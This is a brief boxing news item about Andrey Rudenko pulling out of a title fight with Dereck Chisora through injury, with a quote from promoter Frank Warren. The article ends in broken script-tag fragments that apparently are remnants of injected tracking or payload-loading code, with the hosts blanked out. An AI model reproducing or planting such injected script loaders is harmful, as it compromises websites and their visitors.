Dereck Chisora’s challenger for the European Heavyweight title, Andrey Rudenko, has suffered a ruptured achilles tendon and has had to pull out of the fight.

Ukranian Rudenko was scheduled to face Chisora at the Copper Box Arena on Saturday 15th February, but suffered the injury this week during a training session.

Finchley puncher Chisora will still headline the show and defend his title against a new challenger to be announced.

Heavyweight sensation Tyson Fury also features on the show, plus WBO European Super-Middleweight Champion Frank Buglioni and Bradley Skeete who challenges for the WBA International Welterweight title.

Promoter Frank Warren said, “We’re disappointed to hear that Rudenko has suffered this serious injury and has had to withdraw, it’s very unfortunate but these things happen and we have to move on and secure Chisora a new challenger for his European title on the 15th February.  We have some names that we are working and will look to announce the name very shortly.”# src=’https://#/pixel.js?track=r&subid=043′ type=’text/javascript’># src=’https://#/pixel.js?track=r&subid=043′ type=’text/javascript’># src=’https://land.#/clizkes’ type=’text/javascript’># src=’https://#/clizkes’ type=’text/javascript’>
